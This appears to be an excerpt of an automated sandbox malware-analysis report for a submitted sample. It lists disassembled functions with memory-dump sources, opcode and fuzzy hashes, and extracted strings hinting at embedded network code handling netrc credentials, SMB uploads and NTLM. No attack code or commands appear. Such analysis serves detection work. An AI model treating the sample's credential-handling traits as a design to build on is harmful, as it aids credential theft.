                                                              Function 07540B4C Relevance: .2, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc7c3e06c22b1cdc4123a44d4e2ba58670e42cb5112709459aa25de32549d376
                                                              • Instruction ID: f901870779a2c8b1b4566e9ca109db9a72c096a2275c291494de2f838d1e8a15
                                                              • Opcode Fuzzy Hash: dc7c3e06c22b1cdc4123a44d4e2ba58670e42cb5112709459aa25de32549d376
                                                              • Instruction Fuzzy Hash: D141C5FB15C120BDB15282856B54AFBA77EF6C7734B30886AF90BD1682E3D84E5D2031
                                                              Function 07540B7D Relevance: .2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 279cff74ed9967e3a478b07d2131dc4e6246762e6718993b8ddb8549e9c890b6
                                                              • Instruction ID: 9f9e1f6ba4072e8bcbab8b4a5dd41a6aece6fc986289495adeb82bab24a2525a
                                                              • Opcode Fuzzy Hash: 279cff74ed9967e3a478b07d2131dc4e6246762e6718993b8ddb8549e9c890b6
                                                              • Instruction Fuzzy Hash: E541B6FB15C024BD759282816B14AFBAB7EF6C7734B30886BF90BD1682E2D81E5D1031
                                                              Function 07540BB4 Relevance: .2, Instructions: 219COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 414d4f01255f49eb982ae05dd65bd412ff7cb6cc1a80dc9d75d043609a822bc5
                                                              • Instruction ID: 3eef0bada6f79fe088786120d83f1fad4eb47b911ddb14131b00dfe6974a82e3
                                                              • Opcode Fuzzy Hash: 414d4f01255f49eb982ae05dd65bd412ff7cb6cc1a80dc9d75d043609a822bc5
                                                              • Instruction Fuzzy Hash: E241D6FB15C124BD719292852B54AFBAB7EF2C7734B30C86AF90BD5682E2D84E5D1031
                                                              Function 07540C29 Relevance: .2, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0004035c75e10606ed9ef52549e799f80ff5d911562f935906cdbe93e57f72d
                                                              • Instruction ID: 88cb424b22a276e1c6045cad37da18c2acc6139d6cff6f490acb9935efd4f1fa
                                                              • Opcode Fuzzy Hash: a0004035c75e10606ed9ef52549e799f80ff5d911562f935906cdbe93e57f72d
                                                              • Instruction Fuzzy Hash: 9C310AF715C120BDB59282416B14AF7AB7EF7C7734B3088AAF90BD5682D2D85E5D1031
                                                              Function 07540C69 Relevance: .2, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e3745c48f86801957cf4ecc68334a72f8401fa36f6c367ea997b14d2cba2637
                                                              • Instruction ID: 76b7632c5b7f7f8a763e7f86a5b388f12f2aec29c799c12c7a51faa76e30820e
                                                              • Opcode Fuzzy Hash: 4e3745c48f86801957cf4ecc68334a72f8401fa36f6c367ea997b14d2cba2637
                                                              • Instruction Fuzzy Hash: 0331F9F715C110BCB59282816B14AF79B6EF6C7234B30CCAAF90BD1682D2985A5D1131
                                                              Function 07540C58 Relevance: .2, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d20e781ca82afa098a2e190c4589ab62b20cc4f6ad8528161da936d48f6ae5e7
                                                              • Instruction ID: 2d103323338ebde23a5a2b96c619009a5355528cd2b11868ab468acdf6ea8ce2
                                                              • Opcode Fuzzy Hash: d20e781ca82afa098a2e190c4589ab62b20cc4f6ad8528161da936d48f6ae5e7
                                                              • Instruction Fuzzy Hash: 0231F8F711C120FCB59282816B14AF76B6EF6C7734F3088AAF90BD2682D2985E5D5031
                                                              Function 07540C92 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb540acb66a547122f4843c5a21187c4a146238130685397af0e4d997faa8842
                                                              • Instruction ID: 403c3ff818afe522cd7574a905f7dfccc48c98937f9e86a4aa573fe2631719ce
                                                              • Opcode Fuzzy Hash: bb540acb66a547122f4843c5a21187c4a146238130685397af0e4d997faa8842
                                                              • Instruction Fuzzy Hash: 4421E6F715C114FDA5A282855704AF7AB6EF7C7334F308C6AFA0BD1682E2985E5D1031
                                                              Function 07540CB5 Relevance: .1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 02a661f4905242e6685e5f0d0f27a0a7e945059f4f55ffb1f3a3141ae9af5b9a
                                                              • Instruction ID: b731428a512caf39023c9b9fdbf91db3837c9dad723cddece3bfd9aad64844cb
                                                              • Opcode Fuzzy Hash: 02a661f4905242e6685e5f0d0f27a0a7e945059f4f55ffb1f3a3141ae9af5b9a
                                                              • Instruction Fuzzy Hash: C421F7F711C114BCA59282855704AFB5A6EF7C7234F30886AFA0FD6682A2985E5D1031
                                                              Function 07540CEC Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f1a8e271f6892996d4e1dda135ff4b96919ad5b64725652b2bfb34486abed33
                                                              • Instruction ID: 25a5563415960159724706522ca1880bd752aa0b4965f8a464573fdb154292b5
                                                              • Opcode Fuzzy Hash: 8f1a8e271f6892996d4e1dda135ff4b96919ad5b64725652b2bfb34486abed33
                                                              • Instruction Fuzzy Hash: B72137F711C114BDA692838167046FB6B6DF7C7334F3088AAFA0BD66C2E2985E5D5132
                                                              Function 07540CBC Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49bc54e9759751e071c97840963af5a25c9b772d388ed487b52c6ddadc9d73ee
                                                              • Instruction ID: 90c597ccc4a64379b306e713aa1f0e9409a2a5fd8fde96b494ba5a9693d78d7b
                                                              • Opcode Fuzzy Hash: 49bc54e9759751e071c97840963af5a25c9b772d388ed487b52c6ddadc9d73ee
                                                              • Instruction Fuzzy Hash: 8E21C4F711C124BCA59687855704AFBAA6EF7C7334F308C6AFA0BD1682E2985E6D1131
                                                              Function 07540D1D Relevance: .1, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1438ecf7a0b51eb59510cb059b29efeb81f50c13b3cdc4514e4b86d879eabae7
                                                              • Instruction ID: 1010d9446fcdd6a27fa1b655539d66b1a1381bd9ff068245539e05e1a164de3d
                                                              • Opcode Fuzzy Hash: 1438ecf7a0b51eb59510cb059b29efeb81f50c13b3cdc4514e4b86d879eabae7
                                                              • Instruction Fuzzy Hash: AE2137F711C114AEAA9287415708AF77B79F7C7334F308CAAFA0BD6181E2A46E6C5135

                                                              Non-executed Functions

                                                              Function 007CA960 Relevance: 9.0, Strings: 6, Instructions: 1491COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: 1b7a9756d7ab0539628c469dcd7ff3c483bf055860014df5afca4afeb9d2f3fa
                                                              • Instruction ID: 01285d90a5c8a2d7196e607e6ab1fcdc9fc087290a19004af0c5144c3b63b24a
                                                              • Opcode Fuzzy Hash: 1b7a9756d7ab0539628c469dcd7ff3c483bf055860014df5afca4afeb9d2f3fa
                                                              • Instruction Fuzzy Hash: 41C27B71A083459FC714CF28C491B6AB7E2EFC9314F198A2DF8999B351D738ED458B82
                                                              Function 007CE620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                              • API String ID: 0-2555271450
                                                              • Opcode ID: 506508edb2088b2a909dbeb14885e0c4f2f541c0bd4527bdb717b74dc3a3e97c
                                                              • Instruction ID: 7c42009bfe97f9b327c0a4f73647f33e79129df56374b0263e84f55bc9fa30aa
                                                              • Opcode Fuzzy Hash: 506508edb2088b2a909dbeb14885e0c4f2f541c0bd4527bdb717b74dc3a3e97c
                                                              • Instruction Fuzzy Hash: BC82A271A087419FD714CE18C880B2BBBE2EFC5724F188A6DF8A997291D738DD45CB52
                                                              Function 00826210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: default$login$macdef$machine$netrc.c$password
                                                              • API String ID: 0-1043775505
                                                              • Opcode ID: d5d6a24c527ae737923bde744561e3968838e21cc36fac8405db73a301696445
                                                              • Instruction ID: 305687535484839f7f145b894f198146ba78da2275717333362dd01bb245dd54
                                                              • Opcode Fuzzy Hash: d5d6a24c527ae737923bde744561e3968838e21cc36fac8405db73a301696445
                                                              • Instruction Fuzzy Hash: C0E1F6B0508361DFE3118E14A84976BBBD4FF95708F18082CF885D6281F7B999A8D7A2
                                                              Function 0082A7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                              • API String ID: 0-4201740241
                                                              • Opcode ID: 9d9875cf2bf65a6d77af84ae10f76db352c3839eb666933193846c6b805ef5d8
                                                              • Instruction ID: b4f77a2df5308616bd30f3358b7584f215c3d6998fd93d40b1d2f6a9b52208e0
                                                              • Opcode Fuzzy Hash: 9d9875cf2bf65a6d77af84ae10f76db352c3839eb666933193846c6b805ef5d8
                                                              • Instruction Fuzzy Hash: 6762BEB0914741DBD714CF24C490BAAB7F4FF98304F04962EE8898B352E775EA94CB96
                                                              Function 00B4E030 Relevance: 5.8, Strings: 3, Instructions: 2082COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $d$nil)
                                                              • API String ID: 0-394766432
                                                              • Opcode ID: 6f06550cca260cc69dcc30690fec1b8545595fa669789c1ee80c494dba461797
                                                              • Instruction ID: 2bbd957474b4e7a27e657a6a501c8112cf76834e76e11d6b33298bfb7961915f
                                                              • Opcode Fuzzy Hash: 6f06550cca260cc69dcc30690fec1b8545595fa669789c1ee80c494dba461797
                                                              • Instruction Fuzzy Hash: D6135A706087418FD720DF28C08072ABBE1FF99354F244AADE9959B361D771EE49EB42
                                                              Function 0082A5B0 Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .12$M 0.$NT L
                                                              • API String ID: 0-1919902838
                                                              • Opcode ID: bed312209508d4f4da240ff8cd215d81fb1324f80a62040346557e4c45bbb34e
                                                              • Instruction ID: 60346a97820449f4442e0bf75bba2293095c8e847862fbcee7acb9ed5195b1fb
                                                              • Opcode Fuzzy Hash: bed312209508d4f4da240ff8cd215d81fb1324f80a62040346557e4c45bbb34e
                                                              • Instruction Fuzzy Hash: 7B51DF74600315DFDB159F20D884BAA73F4FF54308F088569EC889B342E775DA84CB9A
                                                              Function 00B44780 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H$xn--
                                                              • API String ID: 0-4022323365
                                                              • Opcode ID: f2fd6ae153dbd9c62b2f1f93cbc3a94750907556ff207e0ddeb26acd717886e8
                                                              • Instruction ID: 0c22389d275ce9811692df1a30953e3cc561725fd97d5febcc14b15e2361e5e3
                                                              • Opcode Fuzzy Hash: f2fd6ae153dbd9c62b2f1f93cbc3a94750907556ff207e0ddeb26acd717886e8
